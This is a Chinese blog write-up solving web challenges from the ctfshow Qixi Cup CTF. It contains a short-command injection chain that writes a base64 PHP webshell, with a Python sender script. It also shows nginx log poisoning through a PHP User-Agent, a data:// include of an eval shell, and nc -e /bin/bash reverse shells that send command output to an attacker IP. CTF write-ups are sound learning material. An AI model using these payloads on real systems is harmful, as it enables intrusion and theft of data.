ctfshow-web【七夕杯】_ctfshow七夕杯-CSDN博客

本文链接：https://blog.csdn.net/qq_63701832/article/details/130611030

文章目录

web签到
easy_calc
easy_cmd
easy_sql

web签到

查看源码

  <form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();" >
                                      <div class="form-group">
                                          <label for="command" class="col-lg-2 col-sm-2 control-label">命令</label>
                                          <div class="col-lg-10">
                                              <input onchange="help();" id="cmd" name="cmd" type="text" class="form-control"  placeholder="ls">
                                              <p id="help" class="help-block">仅支持较短命令执行，且不会回显。</p>

        <script>
			function help(){
				
				if(isSafe($("#cmd").val())){
				   $("#help").css("color","#69cf56");
				   $("#help").html("提交命令执行");
			   }else{
				   $("#help").css("color","#ec1616");
				   $("#help").html("命令字符过长");
			   }
			}
            function isSafe(cmd)
            {
               
                return cmd.length<=7;
            }
            function check(){
               if(isSafe($("#cmd").val())){
                   $("#help").css("color","#69cf56");
				   $("#help").html("提交命令执行");
				   return true;
			   }else{
                   $("#help").css("color","#ec1616");
				   $("#help").html("命令字符过长");
				   return false ;
			   }
				
            }
        </script>

直接访问api/tools.php，post提交cmd参数

cmd=ls />r
访问/api/r

下载到文件,内容为

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

写入新的shell到api/1.php

poc如下

payload.txt
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

    
import requests
import time
url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"
with open("payload.txt", "r") as f:
    for i in f:
        data = {"cmd": i.strip()}
        r=requests.post(url=url,data=data)
        time.sleep(1)
        print(r.text)

test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
    print("you've got it!")

访问/api/1.php执行命令拿到flag

也可以直接用nl命令

nl /*>m

easy_calc

<?php
if(check($code)){
    eval('$result='."$code".";");
    echo($result);    
}
function check(&$code){
    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];
    if(!isset($num1) || !isset($num2) || !isset($symbol) )
    {
        return false;
    }
    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol))
    {
        return false;
    }
    if(preg_match("/^[\+\-\*\/]$/", $symbol))
    {
        $code = "$num1$symbol$num2";
        return true;
    }
    return false;
}

POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1&symbol=%2B&num2=3

最终执行命令的语句是 $n u m 1$ symbol$num2 拼接起来的，而且过滤（）不能调用函数，所以根据语言结构是 include、require、echo这种语句，试着去包含文件。

本地环境测试中

    $num1='include "C:\Users\admin\Desktop\ip.txt";1';
    $symbol="+";
    $num2="2";

成功回显出ip.txt

num1=include "/etc/passwd";1&symbol=%2B&num2=2

成功回显出passwd

日志包含

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

最终流量包

POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

配合data伪协议执行代码

<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
这里可以取消?>来避免编码末位的加号
payload
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1

POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1

easy_cmd

<?php

error_reporting(0);
highlight_file(__FILE__);

$cmd=$_POST['cmd'];

if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
        exec(escapeshellcmd($cmd));
}
?>

正则表达式要求提交的cmd以ping|ls|nc|ifconfig开头，然后进行escapeshellcmd处理

<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd))
{
    $out=escapeshellcmd($cmd);
    print_r($out);
}

nc -e /bin/bash ip port

这里发现escapeshellcmd并不会对命令造成修改

因此尝试用nc反弹shell

nc -e /bin/bash ip port
nc  ip port -e /bin/bash

这里的shell连接后秒断开，尝试通过nc将命令结果外带出来

cmd=nc  IP port -e ls /
cmd=nc  IP port -e cat /secret

easy_sql

sql注入类,先跑下被waf的关键词，暂时没做出来